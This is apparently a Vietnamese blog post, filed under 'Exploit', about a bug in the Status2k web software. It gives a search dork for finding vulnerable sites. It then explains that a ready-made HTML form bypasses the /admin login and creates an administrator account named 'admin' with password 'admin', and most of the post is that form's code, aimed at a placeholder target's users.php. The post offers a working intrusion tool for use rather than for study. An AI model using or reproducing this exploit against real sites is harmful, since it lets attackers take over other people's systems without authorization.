allinurl:dynamicimg.php
Lưu code dưới dạng abc.html ,code này vượt qua kiểm tra đăng nhập /admin sẽ tạo 1 user với quyền administrator
username=password=admin<html>
<title>add adnub</title>
<body link="#00FF00" text="#008000" bgcolor="#000000">
<form method="POST"
action="http://abc.com/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse"
width="100%" bordercolor="#808080">
<tr>
<td>
<p align="center"><b>User & Pass : admin</b></p>
<font color="#00FF00">Add new</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input
type="text" name="adminuser" size="30" value="admin"></td>
</tr>
<tr>
<td>
<p align="center"><b>Password:</b></td>
</tr>
<tr>
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="admin"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight:
700"></td>
</tr>
</form>
</table></html>
Bug của Status2k
Views:
Category:
Exploit
0 comments:
Post a Comment